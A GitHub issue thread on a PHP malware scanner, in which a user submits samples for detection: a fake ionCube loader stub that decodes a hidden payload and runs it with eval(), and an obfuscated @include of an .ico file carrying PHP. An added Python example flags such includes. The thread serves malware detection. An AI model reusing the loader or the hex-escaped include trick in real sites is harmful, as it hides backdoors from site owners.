scr34m / php-malware-scanner

Scans PHP files for malwares and known threats
GNU General Public License v3.0
556 stars 96 forks

new possible examples #38

Closed martiGIT closed 5 years ago

martiGIT commented 5 years ago

Hi, first, thanks for a great piece of software that saved many man-days :)

Second, I would like to share some examples that should also be considered malware. IonCube_loader: frequently malware is encrypted with this kind of popular encoder; also, this is a code example:

<?php //000227
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc34-0x784)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
ENCRYPTED CODE HERE

Second, popular malware includes .ico files with PHP code inside, included as part of PHP. I see that in the rules there are some include(_GET examples, but for this particular example I find malware with this kind of Linux find command:

find /var/www -name '*.ico' -exec grep -l "php" {} \;

Include example:

@include "\x2fhome\x2fsite\x2f01_2\x3002/f\x61vico\x6e_e03\x3628.i\x63o";

The following example is the semi-encoded path:

# echo -e "\x2fhome\x2fsite\x2f01_2\x3002/f\x61vico\x6e_e03\x3628.i\x63o";
/home/site/01_2002/favicon_e03628.ico

The script could check if the included file (ico) contains PHP and then report the problem.
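A defender-side check for the two things described in this comment (an include path built from hex escapes, and an include that points at an .ico file), as an added Python example that is not part of php-malware-scanner or of this thread: it resolves PHP double-quoted escapes the way the echo -e line above does, flags suspicious includes, and tests whether a supposed icon file carries a PHP open tag. All names (INCLUDE_RE, scan_line, contains_php), the extension list and the sample inputs are constructed for this illustration.

```python
import re

# include/require(_once) with a double-quoted string argument, e.g. @include "...";
INCLUDE_RE = re.compile(
    r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"\s*\)?\s*;',
    re.IGNORECASE,
)
# \xHH (1-2 hex digits) and \NNN (1-3 octal digits), as PHP resolves them in double quotes
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
NON_PHP_EXT = (".ico", ".png", ".jpg", ".gif", ".txt")  # assumed list: files an include should never target


def decode_php_string(raw: str) -> str:
    """Resolve the escapes so we see the path PHP would actually open."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return ESCAPE_RE.sub(repl, raw)


def scan_line(line: str) -> list:
    """Return (decoded_path, reasons) for each suspicious include found on the line."""
    findings = []
    for m in INCLUDE_RE.finditer(line):
        raw = m.group(1)
        path = decode_php_string(raw)
        reasons = []
        if ESCAPE_RE.search(raw):
            reasons.append("path built from \\x/octal escapes")
        if path.lower().endswith(NON_PHP_EXT):
            reasons.append("includes a non-PHP file")
        if reasons:
            findings.append((path, reasons))
    return findings


def contains_php(data: bytes) -> bool:
    """The follow-up check the issue asks for: does the included file carry PHP code?"""
    return b"<?php" in data or b"<?=" in data


# Constructed samples: the include from this issue, a benign include and a fake icon header.
SAMPLE_INCLUDE = r'@include "\x2fhome\x2fsite\x2f01_2\x3002/f\x61vico\x6e_e03\x3628.i\x63o";'
BENIGN_INCLUDE = 'require_once "vendor/autoload.php";'
FAKE_ICO = b"\x00\x00\x01\x00<?php echo 'not really an icon'; ?>"

if __name__ == "__main__":
    print(scan_line(SAMPLE_INCLUDE), scan_line(BENIGN_INCLUDE))
    print("fake icon contains PHP:", contains_php(FAKE_ICO))
```

On real files, run scan_line over each line of every .php file and contains_php over the decoded target when it exists, which is the "check if the included file contains PHP" step asked for above.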

scr34m commented 5 years ago

Nice to hear, cheers!

I will think about IonCube, but that's a hard nut. I recently used it on some project, but from time to time I found a decoder, so maybe I could find a decode solution (I have an ionCube license to test encoded code somehow). Could you send the encrypted part in a gist?

And for the .ico issue, #36 may be the answer for you; go there and place a 👍 :)

martiGIT commented 5 years ago

Scanning everything is not a good answer, because this will lead to many false positives and also bad performance. Including an ico file encoded in such a way (with path masking) is rather a scheme that can be taken and used as a pattern.

Please find the gist link below to the IonCube code.

scr34m commented 5 years ago

Ohh, I misunderstood the .ico pattern; I will make a pattern update for this kind of trick. Could you send me the file in a gist as well?

martiGIT commented 5 years ago

This is the only common part that I mentioned before:

@include "\x2fhome\x2fsite\x2f01_2\x3002/f\x61vico\x6e_e03\x3628.i\x63o";

scr34m commented 5 years ago

Pattern added for this include string.

scr34m commented 5 years ago

Oh damn, this file is not ionCube encoded; there is an eval: $__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xb39-0x689))); so we are okay because we detect it.

scr34m commented 5 years ago

And anyway this file seems to be a corrupted payload: "pack(): Type H: illegal hex digit", and I found an analysis here: https://www.sitelock.com/blog/2018/02/fake-ioncube-malware/